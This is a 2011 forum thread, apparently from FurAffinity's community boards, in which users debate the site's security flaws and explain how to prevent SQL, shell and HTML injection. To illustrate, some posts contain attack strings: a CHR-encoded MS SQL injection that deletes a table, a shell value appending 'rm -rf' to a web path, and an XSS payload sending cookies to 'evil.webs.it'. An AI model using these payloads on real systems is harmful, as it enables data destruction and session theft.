Pro tip: I portscanned them a few days later. There was no significant difference. If it takes you more than 2 days to put in an _extremely basic_ set of firewall rules, you are not a competent network administrator.


----------



## Pi (Jan 27, 2011)

And since I'm probably wearing out my welcome on the mainsite...
Something (else) that concerns me that has never been adequately explained:
For some unknown span of time, "bahamut/70.33.186.200" was running a web server that answered any request with a redirect to http://new.maximum.md/. Some time after I pointed it out, it served a 404 for a while, then the web server stopped answering. Weird.

If this kind of thing were to be discovered on _my_ hardware, I would immediately yank the network cable and start going through the configuration. Boxes that serve redirects to eastern-european websites are boxes that give the appearance of being compromised.

Now, granted, I don't know the specifics here, and Yak is Moldovan (.md), so there _may_ be an innocuous reason for this. For the life of me, though, I can't come up with one.


----------



## Ricky (Jan 27, 2011)

Kihari said:


> I've been wondering exactly _what_ this is stripping slashes from, and why it's doing it twice, only to (presumably) put them back again. stripslashes() doesn't work properly, but magically does its job when called twice? All this to make sure things are appearing only in the proper place? Perhaps someone could be kind enough to enlighten me.


 
Occam's Razor, dude 



Pi said:


> Since I think they turn error reporting off (and if  they do, i can pretty much guarantee you that their excuse would be "for  performance reasons") it's _entirely possible_ that the site is  constantly spewing them, and they're just getting ignored.


 
More likely for security reasons, though it's a better idea to just  catch them and send the verbose stuff somewhere nobody has access to...  (picture errors like unescaped quotation marksyou want nobody to see)


----------



## Eevee (Jan 27, 2011)

Ricky said:


> More likely for security reasons, though it's a better idea to just  catch them and send the verbose stuff somewhere nobody has access to...  (picture errors like unescaped quotation marksyou want nobody to see)


It is hilarious yet horrifying that PHP errors spew to _the fucking client_ out of the box, and this is considered normal and expected behavior, and people have to go so much out of their way to put _errors_ in an _error log_ that it's apparently reasonable to just disable error reporting altogether.

Because hey, as long as it runs, right?


----------



## verix (Jan 29, 2011)

The FurAffinity Reparation Plan (henceforth FARP) has been amended thanks in great part to yak's contributions and criticisms.  Again, you can see the journal here: http://www.furaffinity.net/journal/2041783/

For anyone curious on the status of the reverse-engineering nonsense: I'm almost done with the UI. I only need a few more hours to get some more details in, then I can move on to designing the schema of the site. \o/


----------



## Ricky (Jan 30, 2011)

I'm probably (hopefully) stating the obvious, but someone has fuzz tested it?


----------



## verix (Jan 30, 2011)

Ricky said:


> I'm probably (hopefully) stating the obvious, but someone has fuzz tested it?



I'm not sure, but I'm doubtful-- there's only a handful of folk who have the know-how to do that sort of thing.

I could overlook the code and try to find some more stuff. I dunno if I exactly have the best track-record for privacy after the asshole shit I pulled earlier, but hey, I know I can find issues either from the outside or inside, so...


----------



## Ricky (Jan 30, 2011)

Nice!

Asumming they are catching the errors, they might see some interesting stuff bubble up too.


----------



## Armaetus (Jan 30, 2011)

Hopefully they start getting shit fixed _soon_, based on all the posting there by yak.


----------



## Ricky (Jan 31, 2011)

Is Ferrox officially dead?  If not, is there some sort of parallel development going on in order to keep plugging the holes while it's waiting to be released?

I know it has been stated that there's trust issues with some people who have offered to help, but I don't see the problem with making a branch for them to check stuff in and lock down the trunk or whatever, so you can review the diffs before merging it up (and subsequently releasing it to production).


----------



## Eevee (Jan 31, 2011)

Ricky said:


> Is Ferrox officially dead?  If not, is there some sort of parallel development going on in order to keep plugging the holes while it's waiting to be released?


1. My incarnation of Ferrox has been, at the very least, abandoned.  FA itself no longer hosts the code or the bug tracker.
2. There seems to be a new "Ferrox" in development by net-cat and IceWolf.  All I know about it is that it's in PHP and allegedly uses XML-RPC to communicate between modules.
3. yak is working on current-FA as much as he ever has.  The new UI has been used as an excuse not to muck with templates for the time being, but the new "Ferrox" has not.
I am _totally guessing_ on much of this, based on bits and pieces I've heard through the grapevine.  There've been no official announcements about any of it.



Ricky said:


> I know it has been stated that there's trust issues with some people who have offered to help, but I don't see the problem with making a branch for them to check stuff in and lock down the trunk or whatever, so you can review the diffs before merging it up (and subsequently releasing it to production).


This was proposed a few times (as you can see in the logs).  yak never really commented directly on the idea, but he left the very strong impression that we can't submit patches solely because the staff would freak out.


----------



## nrr (Feb 16, 2011)

Because it's relevant: (From "Closure: The Definitive Guide" by Michael Bolin)






OMG HACKERS, etc.


----------



## Ricky (Feb 16, 2011)

Hahaha

Little Bobby Tables, I love it.

Escaping stuff is good.  I've still found vulnerabilities that stemmed from numeric literals being thrown into the SQL that weren't cleansed and I could pretty much do whatever I wanted using exec() and concatenated CHR() funtions (since quotes and stuff were escaped).  It's still a matter of inputs not being cleansed but sometimes shit like this is easy to miss.

Also, why do they need to compile a regexp to replace a single character after they already know the index of it in the string?


----------



## Eevee (Feb 16, 2011)

Ricky said:


> It's still a matter of inputs not being cleansed


If you ever use the words "cleanse", "filter", or "sanitize", you are probably just hiding your program from things that break it rather than fixing your program.  That is Doin' It Wrong.

SQL injection, HTML injection (XSS), shell injection, pathname injection, any kind of injection reallyâ€”these are all problems with language barriers.  Consider the following:


```
eval("somevar = $user_input;");
```

Hopefully even the newest of programmers will cringe at that.  And yet it's exactly what you're doing when you do this:


```
do_query("SELECT * FROM some_table WHERE id=$user_input;");
system("echo $user_input");
open("/var/www/$user_input");
print("<p>Hello, $user_input!</p>");
```

These are all rich languages with specific and powerful syntax.  Injection attacks occur when you forget this fact and dump mystery data into them.  The solution is simple: _do not pass raw data across language boundaries_.  "Sanitizing" isn't the answer; it discards potentially-valid data, and may not actually solve the problem if you don't understand the foreign language well enough.  Most of these systems have some mechanism readily available for either escaping data in the manner they expect or avoiding the problem altogether.

SQL injection is eliminated by an ORM or, at the very least, prepared statements.  Shell injection is eliminated by using an explicit list of arguments and just not invoking a shell.  HTML injection is eliminated by using an auto-escaping template system.  Pathname injection, well, there you might have to actually check for slashesâ€”but honestly I'd prefer not to use user input for filenames if at all possible.

These problems were all solved ages ago, and PHP itself is really to blame for their continued proliferation.  The PHP docs address SQL injection completely wrongly, and a lot of developers still target PHP4 (which doesn't support prepared statements!) or just don't know about mysqli/PDO because they're so used to the MySQL C-like API (?!) that's been the de facto standard for so long.  It is actually _impossible_ to reliably do a safe system call from PHP, because it inexplicably has no support for executing a list of arguments instead of going through the shell.  And since PHP itself is a template language, it's even easier to drop arbitrary data into an HTML document.


----------



## Ricky (Feb 16, 2011)

For XSS, developers need to take it into account when they write display stuff.

For SQL injection attacks, it helps to take it into account at the DAO layer (or similar).

There are a lot of other things to take into consideration as well.

I think a lot of developers just aren't thinking about security.


----------



## Arshes Nei (Feb 17, 2011)

I'm not exactly sure why this was moved since there is actually interesting discussion about good practices on security. If this thread however, goes into personal attacks and insults - the thread can be rightfully shut down.


----------



## Witchiebunny (Feb 17, 2011)

Beat me to it Arshes.


----------



## Arshes Nei (Feb 17, 2011)

I'll let you take over for now, I just did this real quick and I have to work. Thanks again Witchie.


----------



## Summercat (Feb 18, 2011)

On the question of escaping and sanitizing...

I guess I use the term incorrectly - I usually mean by sanitizing by making certain that the data about to be passed to the equations is valid, and to spit out an error and continue instead of crashing. I also mean it in the sense of "I'm going to make certain that the user inputs here can't be used to crash anything."

That said, I have to ask what is wrong with eval(input) or escape(input) ? Un-

Oh. I"m a derp. You're talking cross-language stuff. I'm only now dabbling in with mixing HTML and Python, and so far, everything seems to be okay >.> Still need to learn what may be better for dumping and saving data than using pickle, but so far it seems to work.


----------



## Ricky (Feb 18, 2011)

That's pretty much it.  The distinction I was making is with any loosely typed language it's still easy to escape stuff but be able to pass in unwanted data (and so it's not really sanitized).  Take for example and int that's passed in as a string, but the query reads something like:


```
SELECT * FROM posts WHERE post_id = my_int
```
...and imagine my_int is evaluated here.  Someone could easily change the post ID coming from the form, url or whatever to read:


```
"1; exec(chr(68)+chr(69)+chr(76)+chr(69)+chr(84)+chr(69)+chr(32)+chr(42)+chr(32)+chr(70)+chr(82)+chr(79)+chr(77)+chr(32)+chr(80)+chr(79)+chr(83)+chr(84)+chr(83)) --
```
(this is for MS SQL, of course)

You might look at this and think "wow, what idiot allowed that huge character string to be passed where it was expecting an int" but this is actually a real exploit I found a few years ago in something I was helping out with.  The real easy way to fix this is to convert the passed value to an int somewhere (but that wasn't being done at the time).

Since there are usually several layers in a large web application it helps to have some sort of standardized practice to make sure this all gets done properly.  This way, if one developer was sanitizing stuff when it was checking the submitted POST values and another was doing it when passing the value to the data access object, developer B won't fuck everything up when he starts working on developer A's stuff and start passing in un-sanitized data to functions that aren't expecting it.

There's also other stuff like file inclusion vulnerabilities, code injection flaws (where untrusted data is improperly evaluated) and lots of other stuff.  If you're interested, check out http://www.owasp.org/


----------



## nrr (Feb 18, 2011)

Eevee said:


> It is actually _impossible_ to reliably do a safe system call from PHP, because it inexplicably has no support for executing a list of arguments instead of going through the shell.



Please see pcntl_exec().  This is effectively execve() from C land, which is very safe.



Summercat said:


> I guess I use the term incorrectly - I usually mean by sanitizing by making certain that the data about to be passed to the equations is valid, and to spit out an error and continue instead of crashing.



Ideally, what you would do is determine whether or not the failure is exceptional and trap or toss an exception depending on what's going on.  Continuing with malformed or otherwise potentially not kosher data is pretty much the antithesis of cool.  Though, there's an argument that could be had about tossing a sane default in place and continuing with that.

This brings me to the most important tenet of software development: *Data loss is a disaster.*  If you're cavalier about how you handle data storage and manipulation, you're bound to be misled into a rather unfortunate corner eventually.



Summercat said:


> I also mean it in the sense of "I'm going to make certain that the user inputs here can't be used to crash anything."
> 
> That said, I have to ask what is wrong with eval(input) or escape(input) ? Un-
> 
> Oh. I"m a derp. You're talking cross-language stuff. I'm only now dabbling in with mixing HTML and Python, and so far, everything seems to be okay >.> Still need to learn what may be better for dumping and saving data than using pickle, but so far it seems to work.



Consider using "/my/command $arguments" and inadvertantly allowing $arguments = "some random arguments ; rm -rf /var/www/domains/furaffinity.net/www/deployments/current/*" or similar.

Consider using "<html><!-- stuff --><body><h1>Hello, $name!</h1></body></html>" and inadvertantly allowing $name = "Furry Fan!<script language=\"javascript\">document.write('<img src=\"http://evil.webs.it/e/steal_cookie?cookie=' + encodeURIComponent(document.cookie) + '\" />');</script><h1 style=\"display:none\">" or similar.

Keeping track of these things in a large codebase is a headache, so it's usually best to start early on with a strict separation of concerns.


----------



## Ricky (Feb 18, 2011)

nrr said:


> Consider using "<html><!-- stuff --><body><h1>Hello, $name!</h1></body></html>" and inadvertantly allowing $name = "Furry Fan!<script language=\"javascript\">document.write('<img src=\"http://evil.webs.it/e/steal_cookie?cookie=' + encodeURIComponent(document.cookie) + '\" />');</script><h1 style=\"display:none\">" or similar.


 
I don't think you can backslash double quotes in HTML like that, but I get the point 

Since "javascript" and "text/javascript" are still the defaults for the language or type attributes (respectively) for script tags everywhere, you can pretty much ditch that part anyway.

EDIT:  by the way, I see what you were doing now, if you were actually setting it like that


----------



## nrr (Feb 18, 2011)

Ricky said:


> I don't think you can backslash double quotes in HTML like that, but I get the point



Recall how string interpolation works.  Open up a POSIX shell somewhere and work the exercise on your own.  This is what I did before I posted that.



Ricky said:


> Since "javascript" and "text/javascript" are still the defaults for the language or type attributes (respectively) for script tags everywhere, you can pretty much ditch that part anyway.


 
I don't particularly care.  I'm not testing for potentially broken browsers; instead, I'm testing for potentially broken Web applications, so my application of being clever is rightfully placed here.


----------



## Ricky (Feb 18, 2011)

Yeah, but generally when you're testing something like that as an exploit you're doing it through a browser.

Like I said when I edited my post; I see what you did.  It just threw me off, especially since backslashing works in JS.


----------



## Eevee (Feb 18, 2011)

Summercat said:


> I guess I use the term incorrectly - I usually mean by sanitizing by making certain that the data about to be passed to the equations is valid, and to spit out an error and continue instead of crashing. I also mean it in the sense of "I'm going to make certain that the user inputs here can't be used to crash anything."


If you define "valid" in terms of _what your program actually does_, then this is fine.  Obviously "foo" is not a valid birthdate, or whatever.
If you define "valid" in terms of _what makes your program inconvenient for you_, then this is bollocks.  I see programmers ask how to "strip Unicode" all the time, calling non-ascii characters "invalid" because their program is written badly and chokes on such characters.



Summercat said:


> Oh. I"m a derp. You're talking cross-language stuff.


Using eval() on outside data has the same problems.  But you'd never use eval()...  right?



Summercat said:


> I'm only now dabbling in with mixing HTML and Python, and so far, everything seems to be okay >.>


I'm sure it does, until someone named "<script>alert(document.cookies);</script>" comes along.



Summercat said:


> Still need to learn what may be better for dumping and saving data than using pickle, but so far it seems to work.


A database, perchance?  Pi tells me he recommended sqlite and SQLAlchemy to you already.




Ricky said:


> That's pretty much it.  The distinction I was making is with any loosely typed language it's still easy to escape stuff but be able to pass in unwanted data (and so it's not really sanitized).


Er.  No.
(a) Standard SQL is strongly-typed.  Hell, "select * from table where id = 'foo';" will throw an exception in postgres.
(b) The typing system has nothing to do with this.  Injection attacks have barely any relation to typing, as they can circumvent it as they please; they're arbitrary executed code, after all!



Ricky said:


> You might look at this and think "wow, what idiot allowed that huge character string to be passed where it was expecting an int" but this is actually a real exploit I found a few years ago in something I was helping out with.  The real easy way to fix this is to convert the passed value to an int somewhere (but that wasn't being done at the time).


That's not a fix.  That's the broken advice the PHP "security" documentation gives.  It's case-specific and makes you think and do extra work depending on the query.  It doesn't even reject something that's obviously wrong; why on earth would you consider "1sfuhaewif" to be equivalent to "1"?

It's also the kind of thinking that leads you to throw away data that's hard to deal with when you're working with strings, or ends up with tons of backslashes in your HTML like FA.

Use placeholders.  _Use placeholders.  Use placeholders.  *Use goddamn placeholders.*_  And you NEVER HAVE TO WORRY ABOUT THIS PROBLEM, EVER AGAIN.*  Whatever compelling alternative to placeholders you have, you are wrong.  Placeholders are how this was resolved once and for all _sixteen years ago_ by Perl's DBI; it is completely inexcusable that SQL injection is ever still a problem, anywhere.

(* unless you want to use user input as, say, a table or column name.  so don't do that.)



Ricky said:


> Since there are usually several layers in a large web application it helps to have some sort of standardized practice to make sure this all gets done properly.


Like, say, PLACEHOLDERS.  Or, even better, an ORM.



Ricky said:


> This way, if one developer was sanitizing stuff when it was checking the submitted POST values and another was doing it when passing the value to the data access object--


No!  Stop!  Danger, Will Robinson!

*Don't "sanitize"!*  If user input violates the high-level ("business") logic of your application, *reject it immediately* (or, in special cases e.g. manually-typed dates, try carefully to fit it, unambiguously, to the known format).  If user input contains squiggles, just put it in the database the _right way_.  There is no step in here that should require "sanitizing"â€”aka "arbitrarily throwing away"â€”anything at all.  It's either sensible or not.



Ricky said:


> developer B won't fuck everything up when he starts working on developer A's stuff and start passing in un-sanitized data to functions that aren't expecting it.


Yes, this early addslashes() nonsense is exactly the kind of brain damage that plagues PHP and...  well, ends up putting backslashes all over your HTML.  There is _no_ reason you should have "escaped" or """sanitized""" data floating _anywhere_ within your program.  The same rule as for Unicode applies just as well here: your program should deal with pure virgin data, and you should only worry about how to muck it up with backslashes when you're actually sending it elsewhere, and you shouldn't actually have to worry about it at all because your library should do it for you.


*These are solved problems.*  All developers, everywhere, please stop trying so hard to solve them again in hacky and broken ways.  Good grief.




nrr said:


> Please see pcntl_exec().  This is effectively execve() from C land, which is very safe.


Hallelujah!  Of _course_ it would be the obvious pcntl...  something...  and not system(), or exec(), or shell_exec(), or proc_open(), or popen(), or passthru(), or backticks.  None of which direct to pcntl_exec() as a way to fix the gaping security problem, instead opting to advise you use an escapewhatever() function.  Also you have to fork on your own before using pcntl_exec() or your program will never continue.

PHP: a dozen horrendously insecure choices, and one secure choice that's a pain in the ass to useâ„¢



nrr said:


> Though, there's an argument that could be had about tossing a sane default in place and continuing with that.
> ...
> This brings me to the most important tenet of software development: *Data loss is a disaster.*  If you're cavalier about how you handle data storage and manipulation, you're bound to be misled into a rather unfortunate corner eventually.


I absolutely hate having data quietly "fixed" for me.  Except when it should be.  This could get into a long boring conversation pretty fast, but suffice to say almost everyone is bad at this.  Adolescent PHP allows anything, anywhere; Enterprise SolutionsÂ® require that my password be exactly seven characters and contain only uppercase vowels.  And I weep silently every time a form tells me that my credit card number can't contain spaces.  There are spaces _on. the. card._




Ricky said:


> Yeah, but generally when you're testing something like that as an exploit you're doing it through a browser.


The comment hiding fiasco was perpetrated entirely via wget.


----------



## Ricky (Feb 18, 2011)

Eevee said:


> Er.  No.
> (a) Standard SQL is strongly-typed.  Hell, "select * from table where id = 'foo';" will throw an exception in postgres.
> (b) The typing system has nothing to do with this.  Injection attacks have barely any relation to typing, as they can circumvent it as they please; they're arbitrary executed code, after all!



Er. Yes.

I was referring to PHP or whatever lanuage is being used.  Look at the example I gave.



Eevee said:


> Use placeholders.  _Use placeholders.  Use placeholders.  *Use goddamn placeholders.*_  And you NEVER HAVE TO WORRY ABOUT THIS PROBLEM, EVER AGAIN.*


 
Same thing.  This is generally what I try to do in the DAO itself (when the app is actually designed that way).


----------



## Eevee (Feb 18, 2011)

Ricky said:


> I was referring to PHP or whatever lanuage is being used.  Look at the example I gave.


That doesn't make any sense.  The code you pasted was SQL.  Query data comes in as strings, and SQL statements are strings.  Where does the typing of the programming language come into this?



Ricky said:


> Same thing.  This is generally what I try to do in the DAO itself (when the app is actually designed that way).


Same thing as what?

And, wait, what use is a DAO (which I interpret to be "ORM but more enterprisey and something about XML") if you're still writing queries by hand?

edit: Righto, more enterprisey than I thought.


----------



## Ricky (Feb 18, 2011)

Eevee said:


> That doesn't make any sense.  The code you pasted was SQL.  Query data comes in as strings, and SQL statements are strings.  Where does the typing of the programming language come into this?



If the language is not typed and you're evaluating some variable to put into the query (again, see my example) and you're not using "placeholders" as you say, who's to say that an int needs to be an int and not some arbitrary string that's passed in?

The reason TYPING comes into play is, well... that would never work in a strongly typed language?

Am I not explaining this well or something?  It's really not that complicated at all.



Eevee said:


> Same thing as what?



...you talked about using "placeholders."  That's generally what I do.  I just don't call them that; I generally use the term "bindings."  Whatever, this is semantics.



Eevee said:


> And, wait, what use is a DAO (which I interpret to be "ORM but more enterprisey and something about XML") if you're still writing queries by hand?


 
Data access object?

Who cares, just substitute in "the layer of your application that actually communicates with the datasource."


----------



## Eevee (Feb 18, 2011)

Ricky said:


> If the language is not typed and you're evaluating some variable to put into the query (again, see my example) and you're not using "placeholders" as you say, who's to say that an int needs to be an int and not some arbitrary string that's passed in?
> 
> The reason TYPING comes into play is that would never work in the first place in a strongly typed language.
> 
> Am I not explaining this well or something?  It's really not that complicated at all.


I guess so, because:
1. Python is strongly typed, and it's still vulnerable to SQL injection if you don't use placeholders/prepared statements/whatever.
2. User input from a file or query or whatever can't be an int; it'll always be a string.  (It's not even a string, really; it's just bare bytes.)  I don't see why you think I'd have an int in the first place, unless I specifically converted the supplied string to an int, but that circumvents this particular problem in _any_ language.

But, again, this is kind of irrelevant since it's not something you should ever do.



Ricky said:


> ...you talked about using "placeholders."  That's generally what I do.  I just don't call them that; I generally use the term "bindings."  Whatever, this is semantics.


You haven't used the term "bind" anywhere in this thread; you've just repeated "sanitize" several times, to the point of referencing the problem of double "sanitizing".


----------



## Ricky (Feb 18, 2011)

Eevee said:


> 2. User input from a file or query or whatever can't be an int; it'll always be a string.  (It's not even a string, really; it's just bare bytes.)  I don't see why you think I'd have an int in the first place, *unless I specifically converted the supplied string to an int, but that circumvents this particular problem in any language.*



Isn't that like... exactly what I said?

Oh well, I give up.  This conversation is getting pretty worthless as it just seems like you're trying to nit-pick at everything I say.

I don't really need to prove my knowledge to you anyway, since you're not the one who signs my paycheck


----------



## Eevee (Feb 18, 2011)

Ricky said:


> Isn't that like... exactly what I said?


No; nothing you said really relates to typing.  The conversion here is about extracting meaningful information from data; that it returns a value typed "int" is immaterial, and that type will be discarded anyway as soon as the value is stuck in a query.  Strong or weak, "int($foo)" is not going to give you something with letters or semicolons in it in any language I can name.

You may want to re-read your own posts here; you've now made several references back to things you've never said.  (The example code that wasn't written in anything but SQL, the mention of bindings, and anything at all about type systems.)



Ricky said:


> Oh well, I give up.  This conversation is getting pretty worthless as it just seems like you're trying to nit-pick at everything I say.


Because some of the things you say are incorrect.  8)  Precise disciplines deserve nitpicking.



Ricky said:


> I don't really need to prove my knowledge to you anyway, since you're not the one who signs my paycheck


I never asked you to prove anything, but I'm flattered that you felt obligated enough to explicitly decline.


----------



## Ricky (Feb 18, 2011)

Eevee said:


> You may want to re-read your own posts here; you've now made several references back to things you've never said.  (The example code that wasn't written in anything but SQL, the mention of bindings, and anything at all about type systems.)





Ricky said:


> Take for example and int that's passed in as a string, but  the query reads something like:
> 
> 
> ```
> ...


 
Reading is fun!

EDIT:  And also, there's a difference between legitimate nitpicking and what you're doing.  Nothing I said was incorrect.


----------



## Eevee (Feb 18, 2011)

Then please provide actual code, _not just SQL_, that demonstrates how strong typing prevents SQL injection (or how weak typing is specifically vulnerable to it).


Python is strongly typed, and this code is vulnerable:


```
post_id = request.params['post_id']
cursor.execute("SELECT * FROM posts WHERE post_id = {0}".format(post_id))  # DON'T DO THIS; USE PLACEHOLDERS
```

Perl is weakly typed, and this code is _not_ vulnerable:


```
my $post_id = $req->parameters->{post_id};
my $sth = $dbh->prepare("SELECT * FROM posts WHERE post_id = ?");
$sth->execute($post_id);
```


You cannot get an integer directly out of form data.  If you want an integer, you have to convert, and conversion is available in any language regardless of how strong the typing is.  What you appear to be saying makes no sense, and merely quoting yourself doesn't at all clarify your previous statements.


----------



## Ricky (Feb 18, 2011)

I never said that strong typing prevents that kind of attack altogether; it only would for that one example (assuming you're using an int where you are expecting an int, and not a string).

The reason I'm re-quoting myself is you are half-reading things and then taking what I'm saying out of context (like here).

If you actually read what I wrote, like here:



> The distinction I was making is with any loosely typed language it's  still easy to escape stuff but be able to pass in unwanted data (and so  it's not really sanitized).


you'll see I what I was trying to demonstrate as far as escaping, and here:



> The real easy way to fix this is to convert the passed value to an int somewhere (but that wasn't being done at the time).


...you'll see that's the SAME EXACT THING AS YOU WERE SAYING WHEN YOU CORRECTED ME 

The only reason I even mentioned typing is you wouldn't expect that example in a strongly typed language, unless people are using strings for everything.


----------



## Eevee (Feb 18, 2011)

Ricky said:


> The reason I'm re-quoting myself is you are half-reading things and then taking what I'm saying out of context (like here).


In my many travels, I have learned that "you're taking this out of context" often means "I know what I mean; why don't you?", which in turn means that the original statement isn't nearly as clear as its author thinks.

It makes no sense to "escape stuff but be able to pass in unwanted data".  Escaping and unwanted data are different problems.  The example you gave contained no escaping.  And escaping has no relation to the type system.

As I said, science and engineering deserve precision.  Please stop insisting I derive further meaning from your words, and instead try restating them more clearly.  Or, better yet, _provide clear example code_ as I asked.



Ricky said:


> ...you'll see that's the SAME EXACT THING AS YOU WERE SAYING WHEN YOU CORRECTED ME


No, converting to an int is something I have repeatedly said _not_ to do.  It also has nothing to do with strong typing.



Ricky said:


> The only reason I even mentioned typing is you wouldn't expect that example in a strongly typed language, unless people are using strings for everything.


Once again: query parameters are always strings.  You have strings for everything by default.


----------



## Ricky (Feb 18, 2011)

Eevee said:


> As I said, science and engineering deserve precision.  Please stop insisting I derive further meaning from your words, and instead try restating them more clearly.  Or, better yet, _provide clear example code_ as I asked.


 
I was trying to avoid that since I wasn't trying to talk about a specific language but general practices.

If you still don't understand what I was saying maybe someone else can clarify.  This is getting quite tedious.


----------



## nrr (Feb 18, 2011)

Ricky said:


> Yeah, but generally when you're testing something like that as an exploit you're doing it through a browser.



No?  I do the vast majority of my penetration testing using LWP::UserAgent.  If I have possible exploits involving XSS and CSRF that I'd like to test, I'll use Selenium and browsers running in a VM.

You're reading a little too much into this: My goal is to break the server-side code and find where the implementer on the other side of the ether from me decided that separation of concerns was hard and that shopping was a better idea.  Being pedantic about minute details like the language= attribute in <script /> serves to do nothing but conflate the issue.  *I am not trying to crash the browser or break its parser; rather, I'm trying to make it do what it was intended to do.
*
I figured that illustrating this using the run of the mill POSIX shell was the easiest way, but it seems my assumption was flawed.  Actually, any dollar sign-interpolated language will suffice;  Perl and PHP work as well.



Ricky said:


> Like I said when I edited my post; I see what you did.  It just threw me off, especially since backslashing works in JS.


 
Be more clever.


----------



## Ricky (Feb 18, 2011)

nrr said:


> Be more clever.


 
I know, I know 

That was my bad.

Normally when I'm testing exploits I'll just use a browser or in some cases a proxy, for like...  spoofing MIME types and stuff.

I used to javascript: into the URL field but now that you can change stuff in Firebug I'll just use that.


----------



## nrr (Feb 18, 2011)

Ricky said:


> Normally when I'm testing exploits I'll just use a browser or in some cases a proxy, for like...  spoofing MIME types and stuff.
> 
> I used to javascript: into the URL field but now that you can change stuff in Firebug I'll just use that.


 
Just connect to the JavaScript REPL in Firefox from Emacs and bang on it from there.  I do this a lot too.  I also connect to Rhino using a hacked up swank-js connector for SLIME.

You're being too Enterprise here.  "Team, the issue is conflated.  Please advise."


----------



## Summercat (Feb 18, 2011)

Of course I don't think to check here until I'm about ready to leave for work. HAH! I'll post a reply with some samples from the code I (crappily) coded in about 7 hours of work.

BTW yes, Pi did relay about sqlite and sqalchemy, and I need to look it over. He also recommended (putting it politely) "Learning Python the Hard Way", which did help me learn how %s % (var) worked, but mainly covers stuff I already knew.

I am a big fan of "Make it work first, then make it work well."


----------



## Ricky (Feb 19, 2011)

Summercat said:


> I am a big fan of "Make it work first, then make it work well."


 
_I'm not_, but that's how all of Corporate America seems to function these days.

As long as you have a solid framework and good security practices it should all be in an island anyway, but the biggest headaches are when a project wasn't thought out well in the first place.

As far as the language itself, though...  Who cares?  I mean...  It's probably good to know it before writing something in it, but to be honest I've learned many languages and frameworks on the fly.

Google, FTW


----------



## Summercat (Feb 19, 2011)

Ricky said:


> _I'm not_, but that's how all of Corporate America seems to function these days.
> 
> As long as you have a solid framework and good security practices it should all be in an island anyway, but the biggest headaches are when a project wasn't thought out well in the first place.
> 
> ...


 
Eh. It comes from how I was taught to design and prototype games - get something that works built, then start trimming it and making it better. I'm still learning Python (I just got to the point of figuring out how to get it to play nice with CGI),and half of what I've picked up have been suggestions from other people, "Well, you're doing that, how about this?"

Once I learn the 'better' way, I use that instead. The programs I write might look bad in code, but they work, and I can change how bits of it work at a time so long as it plays nice with the rest of the code.

I'm going to go and get a full reply written up to what Eevee and nrr wrote earlier.


----------



## Summercat (Feb 19, 2011)

To nrr:



> "Ideally, what you would do is determine whether or not the failure is exceptional and trap or toss an exception depending on what's going on. Continuing with malformed or otherwise potentially not kosher data is pretty much the antithesis of cool. Though, there's an argument that could be had about tossing a sane default in place and continuing with that.
> 
> This brings me to the most important tenet of software development: Data loss is a disaster. If you're cavalier about how you handle data storage and manipulation, you're bound to be misled into a rather unfortunate corner eventually."



Generally, the type of errors I'm talking about are putting str into an int input field. Each time I have that in a code, I run a check to see if the input is actualy numeric, and to make double certain, run int(input). I usually stick it in an if:else block (if input.isnumeric():/ else although I've been using try/except a little more frequently.

Other error checking would be "Menu Options 1, 2, 3", if the user puts in something else, it returns "That isn't one of the options" and brings the user back to the input.

As for being cavalier about how I handle data storage and manipulation, I'm going to guess that there are better ways for storing stuff in Python than in a dict, but I haven't encountered anything (as of yet). Also, IIRC, Python dict values have to be objects (str, int, list, tupple, dict, or class instances), and can't be code itself. If I'm wrong on that, please correct me.



> "Consider using "/my/command $arguments" and inadvertantly allowing $arguments = "some random arguments ; rm -rf /var/www/domains/furaffinity.net/www/deployments/current/*" or similar.
> 
> Consider using "<html><!-- stuff --><body><h1>Hello, $name!</h1></body></html>" and inadvertantly allowing $name = "Furry Fan!<script language=\"javascript\">document.write('<img src=\"http://evil.webs.it/e/steal_cookie?cookie=' + encodeURIComponent(document.cookie) + '\" />');</script><h1 style=\"display:none\">" or similar.
> 
> Keeping track of these things in a large codebase is a headache, so it's usually best to start early on with a strict separation of concerns. "



I'm sorry to say, but that went over my head. After seeing this, I went to one of my tools I had written to see if I can't get the input to write html code or not, but it looks like cgi.escape() in python actually covers that. http://docs.python.org/library/cgi.html?highlight=escape#cgi.escape is the particular function I'm using there - the CGI tutorial I was using (had to combine it with another to get it working on the server I'm on) made certain to repeat, several times, to always do that. 

To Eevee:



> "If you define "valid" in terms of what your program actually does, then this is fine. Obviously "foo" is not a valid birthdate, or whatever.
> If you define "valid" in terms of what makes your program inconvenient for you, then this is bollocks. I see programmers ask how to "strip Unicode" all the time, calling non-ascii characters "invalid" because their program is written badly and chokes on such characters."



No, I mean not passing a str to code expecting an int. I usually have it raise some sort of error to the user, by passing such code through a isnumeric() or similar test, then converting it to int. That way, I don't get a crash when people type in "Swordfish" for "How many months?" They instead see "Please input a number" and the input repeated (for example).



> "Using eval() on outside data has the same problems. But you'd never use eval()... right?"



I'm not using eval(), but have no clue why it would be a bad idea to.



> "I'm sure it does, until someone named "<script>alert(document.cookies);</script>" comes along."



As above, I am using cgi.escape() on my inputs, which seems to do the job.



> "A database, perchance? Pi tells me he recommended sqlite and SQLAlchemy to you already."



He did, and as I said in my post before I left for work, I haven't really had a chance to look into it. I've been relatively more concerned making certain my knowledge of Python/HTML/CGI is firm enough to build on. I'll probably be mucking about with those two modules/libs by next week, and the wails of "OMG I AM STUPID I CANT GET THIS TO WORK WWWHHHHHYYYYYY QQ oh I forgot to set the permissions properly again, derp" will resonate the halls of the internet.

The above is a true story and why http://summer.forbiz.info/streamalert/ took me about 8 hours of work. Not solid straight work, though - started at my shift, did some more work when I got home. You'd think I would have learned my lesson after the third time, right? Right?

*needs coffee at work, apparently*

Edit//

Streamalert is still... not quite finished. It'll probably be the first thing I change over to using sqlite and sqalchemy if those do what I think they do, and the HTML results are... plain and rather ugly. 

But I'm putting the code I wrote for it here http://summer.forbiz.info/streamalert/streamalert.rar, so feel free to look at it and tear me apart. It's not cleaned up or commented, and there's a few places in it I think would be better to break up the main function for readability's sake... *shrug*


----------



## Eevee (Feb 19, 2011)

Summercat said:


> I am a big fan of "Make it work first, then make it work well."


Apply that cautiously.  You often won't have time (or inclination) to go back and fix it.  Better to do it as rightly as you can the first time around.



Summercat said:


> I'm still learning Python (I just got to the point of figuring out how to get it to play nice with CGI)


Don't use CGI; it's old and slow and busted.  Use a WSGI framework like Pyramid or Flask or Bottle.



Summercat said:


> As for being cavalier about how I handle data storage and manipulation, I'm going to guess that there are better ways for storing stuff in Python than in a dict, but I haven't encountered anything (as of yet).


Objects, tuples, sets are all common.



Summercat said:


